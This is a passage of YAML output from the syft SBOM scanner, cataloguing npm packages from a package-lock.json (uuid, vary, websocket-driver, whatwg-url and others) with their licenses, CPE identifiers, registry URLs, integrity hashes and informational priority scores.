id: 1ae47d19bb25f29a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: util-deprecate 1.0.2'
|
|
title: util-deprecate 1.0.2
|
|
description: 'Package discovered: util-deprecate 1.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: aac5900c84ec45ff
|
|
name: util-deprecate
|
|
version: 1.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:util-deprecate:util-deprecate:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:util-deprecate:util_deprecate:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:util_deprecate:util-deprecate:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:util_deprecate:util_deprecate:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:util:util-deprecate:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:util:util_deprecate:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/util-deprecate@1.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz
|
|
integrity: sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ea9355f8957e8bab
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: utils-merge 1.0.1'
|
|
title: utils-merge 1.0.1
|
|
description: 'Package discovered: utils-merge 1.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 4f715b1e9b38109a
|
|
name: utils-merge
|
|
version: 1.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:utils-merge:utils-merge:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:utils-merge:utils_merge:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:utils_merge:utils-merge:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:utils_merge:utils_merge:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:utils:utils-merge:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:utils:utils_merge:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/utils-merge@1.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/utils-merge/-/utils-merge-1.0.1.tgz
|
|
integrity: sha512-pMZTvIkT1d+TFGvDOqodOclx0QWkkgi6Tdoa8gC8ffGAAqz9pzPTZWAybbsHHoED/ztMtkv/VoYTYyShUn81hA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 236364fea165c402
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: uuid 10.0.0'
|
|
title: uuid 10.0.0
|
|
description: 'Package discovered: uuid 10.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 21b622d3d64a2c86
|
|
name: uuid
|
|
version: 10.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:uuid:uuid:10.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/uuid@10.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/uuid/-/uuid-10.0.0.tgz
|
|
integrity: sha512-8XkAphELsDnEGrDxUOHB3RGvXz6TeuYSGEZBOjtTtPm2lwhGBjLgOzLHB63IUWfBpNucQjND6d3AOudO+H3RWQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2fb790bc55d11030
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: uuid 8.3.2'
|
|
title: uuid 8.3.2
|
|
description: 'Package discovered: uuid 8.3.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 8cf0c19ede45d1bc
|
|
name: uuid
|
|
version: 8.3.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:uuid:uuid:8.3.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/uuid@8.3.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz
|
|
integrity: sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 3e2f0913d0055c91
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: uuid 9.0.1'
|
|
title: uuid 9.0.1
|
|
description: 'Package discovered: uuid 9.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0bd59342bab05265
|
|
name: uuid
|
|
version: 9.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:uuid:uuid:9.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/uuid@9.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz
|
|
integrity: sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4e3576c544465abd
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: vary 1.1.2'
|
|
title: vary 1.1.2
|
|
description: 'Package discovered: vary 1.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2fc27b955ce3ef5d
|
|
name: vary
|
|
version: 1.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:vary:vary:1.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/vary@1.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/vary/-/vary-1.1.2.tgz
|
|
integrity: sha512-BNGbWLfd0eUPabhkXUVm0j8uuvREyTh5ovRa/dyow/BqAbZJyC+5fU+IzQOzmAKzYqYRAISoRhdQr3eIZ/PXqg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 60e43c65d8e9a8e6
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: victory-vendor 36.9.2'
|
|
title: victory-vendor 36.9.2
|
|
description: 'Package discovered: victory-vendor 36.9.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 14c55cee8eb4e77f
|
|
name: victory-vendor
|
|
version: 36.9.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT AND ISC
|
|
spdxExpression: MIT AND ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:victory-vendor:victory-vendor:36.9.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:victory-vendor:victory_vendor:36.9.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:victory_vendor:victory-vendor:36.9.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:victory_vendor:victory_vendor:36.9.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:victory:victory-vendor:36.9.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:victory:victory_vendor:36.9.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/victory-vendor@36.9.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/victory-vendor/-/victory-vendor-36.9.2.tgz
|
|
integrity: sha512-PnpQQMuxlwYdocC8fIJqVXvkeViHYzotI+NJrCuav0ZYFoq912ZHBk3mCeuj+5/VpodOjPe1z0Fk2ihgzlXqjQ==
|
|
dependencies:
|
|
'@types/d3-array': ^3.0.3
|
|
'@types/d3-ease': ^3.0.0
|
|
'@types/d3-interpolate': ^3.0.1
|
|
'@types/d3-scale': ^4.0.2
|
|
'@types/d3-shape': ^3.1.0
|
|
'@types/d3-time': ^3.0.0
|
|
'@types/d3-timer': ^3.0.0
|
|
d3-array: ^3.1.6
|
|
d3-ease: ^3.0.1
|
|
d3-interpolate: ^3.0.1
|
|
d3-scale: ^4.0.2
|
|
d3-shape: ^3.1.0
|
|
d3-time: ^3.0.0
|
|
d3-timer: ^3.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a846a040ec49fd72
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: vite-compatible-readable-stream 3.6.1'
|
|
title: vite-compatible-readable-stream 3.6.1
|
|
description: 'Package discovered: vite-compatible-readable-stream 3.6.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 874d0721c00b1770
|
|
name: vite-compatible-readable-stream
|
|
version: 3.6.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:vite-compatible-readable-stream:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:vite-compatible-readable-stream:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:vite_compatible_readable_stream:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:vite_compatible_readable_stream:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:vite-compatible-readable:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:vite-compatible-readable:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:vite_compatible_readable:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:vite_compatible_readable:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:vite-compatible:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:vite-compatible:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:vite_compatible:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:vite_compatible:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:vite:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:vite:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/vite-compatible-readable-stream@3.6.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/vite-compatible-readable-stream/-/vite-compatible-readable-stream-3.6.1.tgz
|
|
integrity: sha512-t20zYkrSf868+j/p31cRIGN28Phrjm3nRSLR2fyc2tiWi4cZGVdv68yNlwnIINTkMTmPoMiSlc0OadaO7DXZaQ==
|
|
dependencies:
|
|
inherits: ^2.0.3
|
|
string_decoder: ^1.1.1
|
|
util-deprecate: ^1.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c6d0b110f80cc969
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: webidl-conversions 3.0.1'
|
|
title: webidl-conversions 3.0.1
|
|
description: 'Package discovered: webidl-conversions 3.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 770e2f7ad3b1c524
|
|
name: webidl-conversions
|
|
version: 3.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: BSD-2-Clause
|
|
spdxExpression: BSD-2-Clause
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:webidl-conversions:webidl-conversions:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:webidl-conversions:webidl_conversions:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:webidl_conversions:webidl-conversions:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:webidl_conversions:webidl_conversions:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:webidl:webidl-conversions:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:webidl:webidl_conversions:3.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/webidl-conversions@3.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz
|
|
integrity: sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c76cb0d14c517e35
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: websocket-driver 0.7.4'
|
|
title: websocket-driver 0.7.4
|
|
description: 'Package discovered: websocket-driver 0.7.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 944bd0667b1458ca
|
|
name: websocket-driver
|
|
version: 0.7.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:websocket-driver:websocket-driver:0.7.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:websocket-driver:websocket_driver:0.7.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:websocket_driver:websocket-driver:0.7.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:websocket_driver:websocket_driver:0.7.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:websocket:websocket-driver:0.7.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:websocket:websocket_driver:0.7.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/websocket-driver@0.7.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/websocket-driver/-/websocket-driver-0.7.4.tgz
|
|
integrity: sha512-b17KeDIQVjvb0ssuSDF2cYXSg2iztliJ4B9WdsuB6J952qCPKmnVq4DyW5motImXHDC1cBT/1UezrJVsKw5zjg==
|
|
dependencies:
|
|
http-parser-js: '>=0.5.1'
|
|
safe-buffer: '>=5.1.0'
|
|
websocket-extensions: '>=0.1.1'
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: bb5b0fea2c384fe7
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: websocket-extensions 0.1.4'
|
|
title: websocket-extensions 0.1.4
|
|
description: 'Package discovered: websocket-extensions 0.1.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 6844e064384011a8
|
|
name: websocket-extensions
|
|
version: 0.1.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:websocket-extensions_project:websocket-extensions:0.1.4:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/websocket-extensions@0.1.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/websocket-extensions/-/websocket-extensions-0.1.4.tgz
|
|
integrity: sha512-OqedPIGOfsDlo31UNwYbCFMSaO9m9G/0faIHj5/dZFDMFqPTcx6UwqyOy3COEaEOg/9VsGIpdqn62W5KhoKSpg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c0ee8f2bbf5fd4e3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: whatwg-url 5.0.0'
|
|
title: whatwg-url 5.0.0
|
|
description: 'Package discovered: whatwg-url 5.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0827d54a7a5ea1e5
|
|
name: whatwg-url
|
|
version: 5.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
